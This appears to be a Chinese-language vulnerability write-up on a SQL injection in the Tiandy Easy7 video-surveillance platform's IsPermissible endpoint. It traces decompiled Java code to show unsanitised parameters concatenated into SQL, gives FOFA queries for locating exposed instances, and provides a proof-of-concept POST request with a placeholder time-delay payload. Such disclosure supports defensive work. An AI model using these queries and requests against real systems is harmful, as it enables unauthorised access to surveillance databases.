天地伟业Easy7 /Easy7/rest/user/IsPermissible SQL注入漏洞


漏洞简介

天地伟业Easy7是一款用于视频监控管理的软件系统。

该系统的 /Easy7/rest/user/IsPermissible 接口存在SQL注入漏洞,攻击者可以通过构造恶意请求执行任意SQL语句,可能导致敏感信息泄露或数据库被篡改。

影响版本

fofa语法

body="/Easy7/apps/WebService/LogIn.jsp" || body="Easy7/VideoLib.EXE" || body="/Easy7/index.html" || (body="<img src=\"./images/ico/Easy7_logo_transparent.png") && title="平台"

漏洞分析

首先,该系统基于Spring 3.0,比较古老且WEB-INF/web.xml里没有配置任何filter进行权限校验,因此绝大部分接口都是可以直接访问的。

再来看本次的漏洞接口 /Easy7/rest/user/IsPermissible 对应的 IsPermissible() 方法实现逻辑

@Controller
@RequestMapping({"/user"})
public class CLS_REST_User {
    @Resource(
        name = "boUser"
    )
    private CLS_BO_User boUser;

    @RequestMapping({"/IsPermissible"})
    public void isPermissible(HttpServletRequest req, HttpServletResponse resp, String userId, String objId, int type) throws IOException {
        resp.getWriter().print(this.boUser.isPermissible(userId, objId, type));
    }

参数userId、objId和type被直接带入boUser.IsPermissible方法

public boolean isPermissible(String userId, String objId, int type) {
    if (userId == null) {
        log.error("userId == null");
        return false;
    } else if (objId == null) {
        log.error("objId == null");
        return false;
    } else if (type <= -1) {
        log.error("type <= -1");
        return false;
    } else {
        ArrayList<Integer> lsStatus = this.daoUser.getUserObjStatus(userId, objId, type);

继续跟进 daoUser.getUserObjStatus(userId, objId, type)方法,注意type为整型

public ArrayList<Integer> getUserObjStatus(String userId, String objId, int type) {
    ArrayList<Integer> lsStatus = new ArrayList();
    List<Object> paramList = new ArrayList();
    String query = " SELECT                                                                                     COUNT(*)                                                                FROM                                                                                       " + ToolUtil.viewAuth2Sql(paramList, userId, objId, type) + " AUTH  " + " WHERE                                                                                 " + "     AUTH.S_USER_ID = '" + userId + "'                                                   " + "     AND AUTH.S_OBJ_ID = '" + objId + "'                                                  " + "     AND AUTH.I_AUTHORITY_TYPE_ID = " + type + "                                        ";
    SQLQuery sqlQuery = this.getHibernateTemplate().getSessionFactory().getCurrentSession().createSQLQuery(query);

最终在dao层,参数userId、objId是未经任何过滤或校验直接拼接在where子查询SQL语句中执行,从而造成SQL注入漏洞。

漏洞复现

POST /Easy7/rest/user/IsPermissible HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

userId=SQLI_POC&objId=SQLI_POC&type=1

成功延时5秒


手机扫码阅读

天地伟业Easy7 /Easy7/rest/user/getAuthorityByUserId SQL注入漏洞

天地伟业Easy7 /Easy7/rest/user/getAuthorityByUserId SQL注入漏洞

评 论